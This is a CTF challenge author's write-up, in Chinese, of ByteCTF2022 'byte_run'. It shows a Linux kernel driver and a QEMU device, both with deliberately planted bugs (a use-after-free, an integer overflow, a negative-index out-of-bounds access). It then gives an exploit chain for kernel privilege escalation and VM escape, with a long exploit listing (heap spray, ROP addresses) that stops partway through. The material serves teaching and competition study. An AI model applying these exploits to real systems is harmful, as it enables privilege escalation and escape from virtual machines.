【CTF.0x07】ByteCTF2022 byte_run 出题手记

本文最后更新于:2022年11月24日 凌晨

前年👴当选手的时候还有⑤⭐级的带🏨住,今年当出题人👴只能喝西北风

0x00.一切开始之前

作为一名安全研究员,笔者不知道为什么进了字节跳动当开发,于是就不知道为什么又跑去帮 ByteCTF 出题了(笑)

其实这道题最初的灵感来自于 Google CTF 2021 的一道名为 “fullchain” 的题目,那是一道 chrome v8 + mojo sandbox escape + kernel primitive 的题目,一条非常完整的利用链,笔者觉得非常帅气(笑)

笔者也一直想出一道比较「完整」(full chain)的题目,不过限于自身技术水平较低的缘故再加上这一次的出题时间比较短,于是只弄好了“后端利用”的部分——「Linux kernel提权」 + 「QEMU逃逸」

“后端利用”是笔者临时生造的词,仅在这篇文章的开头表示「拿到了远端代码执行权限之后的利用部分」(笑)

  • kernel 部分的灵感来自于 CVE-2022-0847,也就是“dirty pipe”,笔者模仿内核的 pipe 结构自己写了一个简化版的 pipe,并留下了一个 UAF 漏洞
  • QEMU 部分则主要是一个提供存储功能的“块设备”,漏洞则是非常明显的整数溢出导致的越界读写

在笔者看来整体难度其实并不算太大(因为当笔者开始出这道题目的时候出题时间已经所剩无几了,那时候其实没想出啥好的点子XD),所以在其他出题人都在文档里写“难度中等”的时候只有笔者一个人写了“难度简单”,从最终的解题情况来看的话 这一次整个 pwn 的出题好像都不咋能吸引大佬来做……

本次题目源码已经全部开源:https://github.com/arttnba3/ByteCTF2022_PWN-ByteRun

0x01.题目分析

u1s1,这一次编译出来的代码再反汇编之后确实比较难看,哪怕是笔者作为出题人尝试逆了一下也没能在短时间内看明白整个题目的运行逻辑(笑)

一、内核模块部分

笔者一开始就想写一个功能上比较完整的设备驱动,于是包括与设备交互那一块的代码也集成在了内核模块中,不过在这里笔者设定了驱动存在着两种运行模式:流(stream)模式和块(block)模式,其中前者是与设备无关的管道功能部分,后者则是与设备交互的部分,但是后者的功能需要 root 权限才能开启,于是第一个任务就是内核提权;)

在模块初始化函数当中为 PCI 设备进行了相应的接口注册:

1
2
3
4
5
6
/**
 * bytedev_init() - module entry point.
 *
 * Registers the PCI driver with the PCI core; all per-device setup is
 * deferred to bytedev_pci_probe() when a matching device is enumerated.
 * The "//..." elision below is the article author's: the char-dev
 * class/major registration is hidden here.
 */
static int __init bytedev_init(void)
{
//...
/* register pci driver */
return pci_register_driver(&bytedev_driver);
}

当一个新的 bytedev 设备插进来的时候,内核便会遍历驱动注册的 id_table,比对设备的 vendor/device ID,匹配成功后调用到我们的初始化函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * PCI match table: the PCI core compares each enumerated device's
 * vendor/device ID pair against these entries; a zeroed entry
 * terminates the table.
 */
static const struct pci_device_id bytedev_ids[] = {
{ PCI_DEVICE(PCI_VENDOR_ID_BYTEDEV, PCI_DEVICE_ID_BYTEDEV) },
{ 0, },
};

/* Export the match table so hotplug tooling can autoload the module. */
MODULE_DEVICE_TABLE(pci, bytedev_ids);

/* probe/remove are invoked by the PCI core on device add/removal. */
static struct pci_driver bytedev_driver = {
.name = "bytedev",
.id_table = bytedev_ids,
.probe = bytedev_pci_probe,
.remove = bytedev_pci_remove,
};

对于每个插上来的 bytedev 类型的设备,驱动都会动态生成一个对应的结构 bytedev,并使用 pci_request_regions() 等函数进行资源的探测与占用,从而使得无法直接通过在用户态进程打开设备资源文件的方式与设备进行交互

其实可以通过提权后卸载内核模块的方式来重新实现直接通过设备资源文件与设备进行交互,但实际上在内核模块当中笔者早已封装好了所需要使用的接口(笑)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
static int bytedev_pci_probe(struct pci_dev *pdev,
const struct pci_device_id *id)
{
struct bytedev *bdev;
struct device *dev_node;
char dname[BYTEDEV_DEVNAME_LENGTH];
int minor_num;
int err;

printk(KERN_INFO "[bytedev:] ByteDance pci device detected!");

/* alloc space for bytedev struct*/
if (!(bdev = kzalloc(sizeof(struct bytedev), GFP_KERNEL))) {
err = -ENOMEM;
goto err_no_mem;
}

pci_set_drvdata(pdev, bdev);

/* enable the device */
if ((err = pci_enable_device(pdev))) {
printk(KERN_ERR "[bytedev:] Cannot enable PCI device, abort.");
goto err_out_free_dev;
}

/* check for MMIO flags on BAR 0 */
if (!(pci_resource_flags(pdev, 0) & IORESOURCE_MEM)) {
printk(KERN_ERR
"[bytedev:] Cannot find PCI device base address for MMIO, abort.");
err = -ENODEV;
goto err_out_disable_pdev;
}

/* check for PMIO flags on BAR 1 */
if (!(pci_resource_flags(pdev, 1) & IORESOURCE_IO)) {
printk(KERN_ERR
"[bytedev:] Cannot find PCI device base address for PMIO, abort.");
err = -ENODEV;
goto err_out_disable_pdev;
}

/* request for PCI bar spaces */
if ((err = pci_request_regions(pdev, DRV_NAME))) {
printk(KERN_ERR "Cannot obtain PCI resources, abort.");
goto err_out_disable_pdev;
}

/* iomap for mmio space */
bdev->mmio_addr = pci_ioremap_bar(pdev, 0);
if (!bdev->mmio_addr) {
printk(KERN_ERR "Cannot ioremap for MMIO space, abort.");
err = -ENOMEM;
goto err_out_free_region;
}

/* get I/O ports base */
bdev->io_base = pci_resource_start(pdev, 1);

/* register device node */
minor_num = bytedev_get_unused_minor_num();

if (minor_num < 0) {
printk(KERN_ERR "[bytedev:] bytedev amount limits!");
goto err_out_iounmap_mmio;
}
else if (minor_num == 0) {
snprintf(dname, sizeof(dname), "%s", DEVICE_NAME);
} else{
snprintf(dname, sizeof(dname), "%s%d", DEVICE_NAME, minor_num);
}

dev_node = device_create(bytedev_class, NULL,
MKDEV(bytedev_major_num, minor_num),
NULL, dname);
if (IS_ERR(dev_node)) {
printk(KERN_ERR "[bytedev:] Failed to create the device!");
err = PTR_ERR(dev_node);
goto err_out_unuse_minor;
}

/* other data init */
spin_lock_init(&bdev->dev_lock);
memset(bdev->data_queue, 0, sizeof(void*) * BYTEDEV_MAX_BUFS);
bdev->head_idx = 0;
bdev->tail_idx = 0;

/* info records */
bdev->pdev = pdev;
bdev->dev_node = dev_node;
bdev->minor_num = minor_num;
bytedev_arr[minor_num] = bdev;

printk(KERN_INFO "[bytedev:] bytedev%d register complete.", minor_num);

return 0;

err_out_unuse_minor:
bytedev_set_unused_minor_num(minor_num);
err_out_iounmap_mmio:
pci_iounmap(pdev, bdev->mmio_addr);
err_out_free_region:
pci_release_regions(pdev);
err_out_disable_pdev:
pci_disable_device(pdev);
err_out_free_dev:
kfree(bdev);
err_no_mem:
return err;
}

其中 bytedev 结构体定义如下:

1
2
3
4
5
6
7
8
9
10
11
/*
 * Per-device state, allocated in bytedev_pci_probe().
 * data_queue is a ring of heap buffers shared between stream readers
 * and writers; head_idx/tail_idx are the consumer/producer cursors.
 */
struct bytedev {
struct device *dev_node;  /* node from device_create() */
struct pci_dev *pdev;     /* owning PCI device */
int minor_num;            /* index into bytedev_arr[] */
u64 __iomem *mmio_addr;   /* ioremapped BAR 0 (MMIO) */
u64 io_base;              /* port base of BAR 1 (PMIO) */

spinlock_t dev_lock;      /* guards the ring below */
struct bytedev_data *data_queue[BYTEDEV_MAX_BUFS];
int head_idx, tail_idx;   /* read cursor / write cursor */
};

对于流模式而言,其使用一个环形队列 data_queue 来实现进程间的数据传递,我们可以直接通过读写设备文件来实现对环形队列的数据读写,其本质上是一个如下结构的指针数组:

1
2
3
4
/*
 * One ring-queue entry: a 4-byte header followed by inline payload.
 * len = bytes written so far, offset = bytes already consumed by
 * readers; data[0] is the pre-C99 flexible-array idiom.
 */
struct bytedev_data {
unsigned short len, offset;
char data[0];
};

第一个漏洞便存在于读的过程当中:当一个 buffer 中的数据被读取完毕并被 kfree() 释放之后,环形队列中对应的指针并没有被清空,从而留下了一个 UAF(悬垂指针)。不过在正常地对该功能的使用上这并不会造成影响,因为 slub allocator 并不似 ptmalloc 那样恒定使用前 8 字节来存放 next free object,这使得其统计数据字段(len/offset)得以保留

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/**
 * bytedev_stream_read() - .read handler for stream mode.
 *
 * Drains the ring queue into the user buffer, advancing each entry's
 * offset; a fully-consumed, full-sized entry is kfree()d.
 *
 * INTENTIONAL CHALLENGE BUG: after kfree() the queue slot is NOT
 * cleared (see the commented-out line), leaving a dangling pointer in
 * data_queue[] -- the UAF the exploit builds on.
 *
 * NOTE(review): -EFAULT for an empty queue is unconventional
 * (-EAGAIN would be expected) -- presumably deliberate for the
 * challenge.
 */
static ssize_t bytedev_stream_read(struct file *f, 
char __user *buf,
size_t size,
loff_t *loff)
{
struct bytedev *dev = f->private_data;
ssize_t ret;
ssize_t rlen = 0;

if (bytedev_queue_empty(dev)) {
ret = -EFAULT;
goto out;
}

while (size > 0) {
struct bytedev_data *d;
unsigned int left, clen;

/**
* If the data queue is already empty,
* just quit out is OK.
*/
if (bytedev_queue_empty(dev)) {
ret = rlen;
goto out;
}

d = dev->data_queue[dev->head_idx];
left = d->len - d->offset;
clen = left > size ? size : left;

ret = copy_to_user(buf + rlen, &d->data[d->offset], clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while reading the buffer!");
goto out;
}

size -= clen;
d->offset += clen;
rlen += clen;

if (d->offset == d->len) {
if (d->len == BYTEDEV_BUF_SIZE) {
kfree(d);
/* there's where we made our basic bug: a UAF */
//dev->data_queue[dev->head_idx] = NULL;
dev->head_idx++;
dev->head_idx %= BYTEDEV_MAX_BUFS;
} else {
/* partially-filled tail entry: stop instead of freeing it */
ret = rlen;
break;
}
}
}

ret = rlen;

out:

return ret;
}

第二个漏洞则存在于写的过程当中,在对统计数据字段的判定当中存在一个整型溢出漏洞,若是正常使用则仍不会触发这个漏洞,但若是我们可以通过 UAF 修改其为一个较大的值,那么我们就可以让内核模块认为该 buffer 依然有可以写入的空间,从而完成越界写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
/**
 * bytedev_queue_last_empty() - nonzero if the most recently allocated
 * ring entry still has unfilled space.
 *
 * INTENTIONAL CHALLENGE BUG: if `len` has been corrupted (via the read
 * path's UAF) to exceed BYTEDEV_BUF_SIZE, the subtraction wraps --
 * presumably BYTEDEV_BUF_SIZE involves sizeof() and is size_t, so the
 * result is a huge unsigned value (TODO confirm against the macro
 * definition) -- and the check passes, letting the writer compute an
 * enormous `left` and write out of bounds.
 */
static inline int bytedev_queue_last_empty(struct bytedev *dev)
{
int idx = (dev->tail_idx - 1 + BYTEDEV_MAX_BUFS) % BYTEDEV_MAX_BUFS;

if (!dev->data_queue[idx]) {
return 0;
}

/* there's where we made our expand bug: integer overflow */
return (BYTEDEV_BUF_SIZE - dev->data_queue[idx]->len) > 0;

/* the correct version */
//return dev->data_queue[idx]->len < BYTEDEV_BUF_SIZE;
}

/**
 * bytedev_stream_write() - .write handler for stream mode.
 *
 * First tops up the last, partially-filled ring entry (this is where
 * the integer overflow in bytedev_queue_last_empty() becomes an OOB
 * write), then allocates fresh BYTEDEV_BUF_SIZE entries for the rest.
 *
 * NOTE(review): the kmalloc() below is unchecked -- a NULL return
 * would be dereferenced immediately.
 */
static ssize_t bytedev_stream_write(struct file *f,
const char __user *buf,
size_t size,
loff_t *loff)
{
struct bytedev *dev = f->private_data;
ssize_t ret;
ssize_t wlen = 0;

if (bytedev_queue_full(dev)) {
ret = -EFAULT;
goto out;
}

while (size > 0) {
struct bytedev_data *d;
unsigned int left, clen;
int d_idx;

/**
* If the data queue is already full,
* just quit out is OK.
*/
if (bytedev_queue_full(dev)) {
ret = wlen;
goto out;
}

/**
* Fill the unused part of last buffer.
* We mainly fill the data that is less than BYTEDEV_BUF_SIZE there.
*/
if (bytedev_queue_last_empty(dev)) {
int d_idx =
(dev->tail_idx - 1 + BYTEDEV_MAX_BUFS) % BYTEDEV_MAX_BUFS;
struct bytedev_data *d = dev->data_queue[d_idx];
/* with a corrupted d->len this wraps to a huge value: OOB write */
unsigned int left = BYTEDEV_BUF_SIZE - d->len;
unsigned int clen = left > size ? size : left;

ret = copy_from_user(&d->data[d->len], buf + wlen, clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while writing the buffer!");
goto out;
}

size -= clen;
d->len += clen;
wlen += clen;

continue;
}

/**
* When we arrive at there, it means that there's no space left
* on the tail buffer, so we alloc a new buffer there.
*/
d_idx = dev->tail_idx;
dev->data_queue[d_idx] =
kmalloc(BYTEDEV_BUF_SIZE + sizeof(struct bytedev_data),
GFP_KERNEL_ACCOUNT);
dev->tail_idx++;
dev->tail_idx %= BYTEDEV_MAX_BUFS;

d = dev->data_queue[d_idx];
d->len = 0;
d->offset = 0;

/* Copy the data there */
left = BYTEDEV_BUF_SIZE;
clen = left > size ? size : left;

ret = copy_from_user(&d->data[d->len], buf + wlen, clen);
if (ret) {
printk(KERN_ERR "[bytedev:] failed while writing the buffer!");
goto out;
}

size -= clen;
d->len += clen;
wlen += clen;
}

ret = wlen;

out:

return ret;
}

二、QEMU 设备部分

第二阶段则是对设备 block 模式下的应用,这里 QEMU 模拟了一个类似于硬盘的设备,我们可以读写指定的扇区(大小为 512 字节)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* Emulated "disk": 256 lazily-allocated 512-byte sectors. */
#define BYTEDEV_SECTOR_SIZE 512
#define BYTEDEV_SECTOR_NUM 256

/* Guest-visible register file, driven through PMIO. */
typedef struct BYTEPCIDevRegs {
int mode;        /* BYTEDEV_MODE_STREAM or BYTEDEV_MODE_BLK */
int blk_idx;     /* currently selected sector (int: may go negative) */
int blk_status;  /* READY/BUSY gate around sector switching */
} BYTEPCIDevRegs;

typedef struct BYTEPCIDevState {
/*< private >*/
PCIDevice parent_obj;   /* QOM parent; must stay first */

/*< public >*/
BYTEPCIDevRegs regs;

MemoryRegion mmio;      /* BAR 0: sector data read/write */
MemoryRegion pmio;      /* BAR 1: mode/sector control */

/* one heap pointer per sector, g_malloc'd on first selection */
char *blk_mem[BYTEDEV_SECTOR_NUM];
} BYTEPCIDevState;

其中我们使用 PMIO 来实现设备模式的获取与切换、扇区的切换,使用 MMIO 来实现对特定扇区的读写,而漏洞便出在扇区的切换上,虽然设备里有一个后向的扇区索引越界检查,但是存储当前扇区索引所使用的为 int 类型的变量,而设备代码中并没有对索引为负数的情况进行检查,因此我们可以进行前向的越界操作,若是在低地址处存在可利用的指针则可以直接完成越界的读写操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/**
 * byte_dev_pmio_write() - PMIO (BAR 1) write handler.
 *
 * BYTEDEV_REG_MODE switches stream/block mode; BYTEDEV_REG_BLK_IDX
 * selects the active sector, allocating its backing store on first use.
 *
 * INTENTIONAL CHALLENGE BUG: op_idx is a signed int and only the upper
 * bound is checked, so a negative index makes later blk_mem[] accesses
 * read/write pointers *before* the array -- the OOB the escape uses.
 */
static void
byte_dev_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
BYTEPCIDevState *ds = BYTEDEV_PCI(opaque);
int op_idx = val;

/* only 4-byte accesses are accepted */
if (size != 4) {
return ;
}

smp_mb();

switch (addr) {
case BYTEDEV_REG_MODE:
switch (val) {
case BYTEDEV_MODE_BLK:
case BYTEDEV_MODE_STREAM:
ds->regs.mode = val;
break;
default:
return ;
}
break;
case BYTEDEV_REG_BLK_IDX:
if (ds->regs.blk_status == BYTEDEV_BLK_STATUS_BUSY) {
return ;
}

if (ds->regs.mode != BYTEDEV_MODE_BLK) {
return ;
}
/**
* There's where we made our basic bug: OOB rw forward
* Because there's no check for minus idx there.
* */
if (op_idx >= BYTEDEV_SECTOR_NUM) {
return ;
}

ds->regs.blk_idx = op_idx;
ds->regs.blk_status = BYTEDEV_BLK_STATUS_BUSY;
/* lazy per-sector allocation; a negative idx indexes before blk_mem */
if (!ds->blk_mem[ds->regs.blk_idx]) {
ds->blk_mem[ds->regs.blk_idx] = g_malloc(BYTEDEV_SECTOR_SIZE);
}
ds->regs.blk_status = BYTEDEV_BLK_STATUS_READY;
break;
default:
break;
}

}

0x02.漏洞利用

漏洞的利用存在两个阶段:第一阶段是利用内核模块中流模式存在的漏洞完成提权,第二阶段则是利用模拟设备中存在的漏洞完成虚拟化逃逸

Stage.I - kernel primitive

由于我们直接有 UAF 和越界读写,那么第一阶段的解题思路就比较清晰了,我们可以先写入一个 buffer 后读取出该 buffer 制造出 UAF,之后利用其他结构体改写其数据统计字段,之后再通过越界写进行提权,需要注意的是由于开启了 hardened usercopy 检查,我们需要直接在下一个 object 中进行数据写入,而不能进行跨 object 的数据拷贝

由于分配 buffer 所用的 flag 为 GFP_KERNEL_ACCOUNT,因此最后的提权解法直接套用 CVE-2021-22555 的堆喷 msg_msg + sk_buff 的模板即可

Stage.II - QEMU escape

由于读写过程为通过对应索引的指针完成读写,因此我们需要向前寻找指向合适区域的指针来实现利用,万幸的是我们前向可读的区域中有 MemoryRegion,还有设备结构体的父类 PCIDevice :

利用 MemoryRegion 我们可以泄露出设备自身结构体的地址并读写开头的 512 字节,我们可以在其 io_regions 中的空闲字段构造 ROP 或是一些其他东西

对于 PCIDevice 我们可以利用最上层的父类 Object 的 properties 成员泄露出 glib 的基地址,从而泄露出 glibc 的基地址(其加载地址间偏移固定);同时我们还能通过其 io_regions 字段完成对 MemoryRegion 的读写

那么整个利用思路就非常清晰了:我们先前向读取 properties 泄露出 libc,之后读取 MemoryRegion 泄露出设备结构体地址,在 PCIDevice.io_regions 上构造 fake MemoryRegionOps 后劫持 PMIO 的 MemoryRegion 的 ops 从而完成虚拟机逃逸

FINAL EXPLOIT

最终的 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <signal.h>

/* msg_msg spray sizes: primary fills kmalloc-4k, secondary kmalloc-1k */
#define PRIMARY_MSG_SIZE 0x1000
#define SECONDARY_MSG_SIZE 0x400

#define PRIMARY_MSG_TYPE 0x41
#define SECONDARY_MSG_TYPE 0x42
#define VICTIM_MSG_TYPE 0x1337
#define MSG_TAG 0xAAAAAAAA

#define SOCKET_NUM 8
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define MSG_QUEUE_NUM 4096

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/* Pre-computed kernel symbol addresses (no-KASLR base 0xffffffff81000000) */
#define ANON_PIPE_BUF_OPS 0xffffffff81e2d980
/*
 * BUGFIX: the published source read 0xffffffff810bb9c04 -- 17 hex
 * digits (68 bits), which cannot fit a 64-bit address; the trailing
 * '4' was a stray digit. (Unused by this exploit, which goes through
 * INIT_CRED/COMMIT_CREDS instead.)
 */
#define PREPARE_KERNEL_CRED 0xffffffff810bb9c0
#define INIT_CRED 0xffffffff8224aca0
#define COMMIT_CREDS 0xffffffff810bb710
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff81a01086
#define POP_RDI_RET 0xffffffff811af57d

/* usable payload of one kmalloc-4k ring entry (header excluded) */
#define BYTEDEV_BUF_SIZE (4096 - sizeof(struct bytedev_data))

/* custom ioctl commands understood by the kernel module */
#define BYTEDEV_MODE_CHANGE 0x114514
#define BYTEDEV_BLK_IDX_CHANGE 0x1919810

#define BYTEDEV_SECTOR_SIZE 512
#define BYTEDEV_SECTOR_NUM 256

/* libc offsets for Ubuntu 22.04 glibc 2.35-0ubuntu3.1 */
#define LIBC_SYSTEM 0x50d60
#define LIBC_MOV_RSP_RDX_RET 0x5a170
#define LIBC_MOV_RDX_PTRRDIADD8_MOV_PTRRSP_RAX_CALL_PTRRDXADD0x20 0x1675b0
#define LIBC_POP_RDI_RET 0x2a3e5
#define LIBC_RET 0x2a3e6
#define LIBC_BIN_SH 0x1d8698
#define LIBC_PUTS 0x80ed0

enum BYTEDEV_MODE {
BYTEDEV_MODE_STREAM = 0,
BYTEDEV_MODE_BLK,
};

/* mirrors the kernel module's ring entry header */
struct bytedev_data {
unsigned short len, offset;
char data[0];
};

struct list_head {
uint64_t next;
uint64_t prev;
};

/* userland mirror of the kernel's struct msg_msg header (48 bytes) */
struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

struct {
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
} primary_msg;

struct {
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} secondary_msg;

/**
 * skb_shared_info need to take 320 bytes at the tail
 * so the max size of buf we should send is:
 * 1024 - 320 = 704
 */
char fake_second_msg[704];

/* large enough to OOB-read one msg_msg + one msg_msgseg page */
struct {
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) \
+ 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/* userland mirror of the kernel's struct pipe_buffer (40 bytes) */
struct pipe_buffer {
uint64_t page;
uint32_t offset, len;
uint64_t ops;
uint32_t flags;
uint32_t padding;
uint64_t private;
};

struct pipe_buf_operations {
uint64_t confirm;
uint64_t release;
uint64_t try_steal;
uint64_t get;
};

/* userland context saved for the iretq trampoline */
size_t user_cs, user_ss, user_rflags, user_sp;

/**
 * Snapshot userland cs/ss/rsp/rflags into globals so the kernel ROP
 * chain's swapgs+iretq trampoline can return into this process.
 * NOTE(review): this is Intel-syntax inline asm referencing globals by
 * symbol name -- presumably built with -masm=intel; confirm the build
 * flags, as default AT&T syntax would not assemble.
 */
void saveStatus()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\n\033[0m");
}

/* Print a highlighted error message and terminate the exploit. */
void errExit(char *msg)
{
    static const char banner[] = "\033[31m\033[1m[x] Error: %s\033[0m\n";

    printf(banner, msg);
    exit(EXIT_FAILURE);
}

/*
 * Blocking receive wrapper: msgsz counts the whole user struct, so the
 * leading `long mtype` is subtracted before calling msgrcv().
 */
int readMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    size_t payload_len = msgsz - sizeof(long);

    return msgrcv(msqid, msgp, payload_len, msgtyp, 0);
}

/*
 * Send wrapper: stamps the caller-chosen type into the leading mtype
 * slot, then queues msgsz minus the mtype header bytes.
 */
int writeMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    size_t payload_len = msgsz - sizeof(long);

    ((long *)msgp)[0] = msgtyp;
    return msgsnd(msqid, msgp, payload_len, 0);
}

/**
 * Non-destructive read: MSG_COPY | IPC_NOWAIT copies the message at
 * position `msgtyp` (with MSG_COPY the type argument is an index, not
 * a type) without removing it from the queue -- this is what lets the
 * exploit re-read the corrupted msg_msg repeatedly.
 * NOTE(review): MSG_COPY requires CONFIG_CHECKPOINT_RESTORE in the
 * target kernel.
 */
int peekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
int __msgsz = msgsz - sizeof(long);
return msgrcv(msqid, msgp, __msgsz, msgtyp, MSG_COPY | IPC_NOWAIT);
}

void buildMsg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/*
 * Queue SK_BUFF_NUM identical payloads on the write end of every
 * socket pair, forcing the kernel to allocate that many sk_buff data
 * buffers holding our bytes. Returns 0 on success, -1 on any failure.
 */
int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int sock = 0; sock < SOCKET_NUM; sock++) {
        for (int nr = 0; nr < SK_BUFF_NUM; nr++) {
            ssize_t sent = write(sk_socket[sock][0], buf, size);

            if (sent < 0) {
                printf("[x] failed to spray %d sk_buff for %d socket!", nr, sock);
                return -1;
            }
        }
    }

    return 0;
}

/*
 * Drain every payload queued by spraySkBuff(), releasing the backing
 * sk_buff buffers back to the slab. Returns 0 on success, -1 on error.
 */
int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int sock = 0; sock < SOCKET_NUM; sock++) {
        for (int nr = 0; nr < SK_BUFF_NUM; nr++) {
            ssize_t got = read(sk_socket[sock][1], buf, size);

            if (got < 0) {
                puts("[x] failed to received sk_buff!");
                return -1;
            }
        }
    }

    return 0;
}

/**
 * Trigger the module's two bugs back to back:
 *  1. write+read one full entry so the read path kfree()s it but
 *     leaves the dangling pointer in the ring (the UAF);
 *  2. reclaim that slab object with an sk_buff whose first bytes forge
 *     a bytedev_data header with len = BYTEDEV_BUF_SIZE + 1;
 *  3. one more 1-byte write then goes through the integer-overflow
 *     path and lands out of bounds in the *next* slab object.
 * NOTE(review): fake_data comes from plain malloc(), so its `offset`
 * field is uninitialized garbage -- presumably irrelevant to the write
 * path, but worth confirming.
 */
void trigerOutOfBoundWrite(int dev_fd, int socket_fd[2])
{
struct bytedev_data *fake_data;
char *trash_data;

/* free the first buffer in bytedev queue */
trash_data = malloc(BYTEDEV_BUF_SIZE);
memset(trash_data, 0x84, BYTEDEV_BUF_SIZE);

printf("[*] write %ld bytes to dev \n",
write(dev_fd, trash_data, BYTEDEV_BUF_SIZE));
printf("[*] read %ld bytes from dev\n",
read(dev_fd, trash_data, BYTEDEV_BUF_SIZE));

/* construct fake bytedev_data */
fake_data = malloc(sizeof(struct bytedev_data) + BYTEDEV_BUF_SIZE);
fake_data->len = BYTEDEV_BUF_SIZE + 1;

/* 320 bytes reserved at the tail for skb_shared_info */
puts("[*] re-get the buffer by sk_buff...");
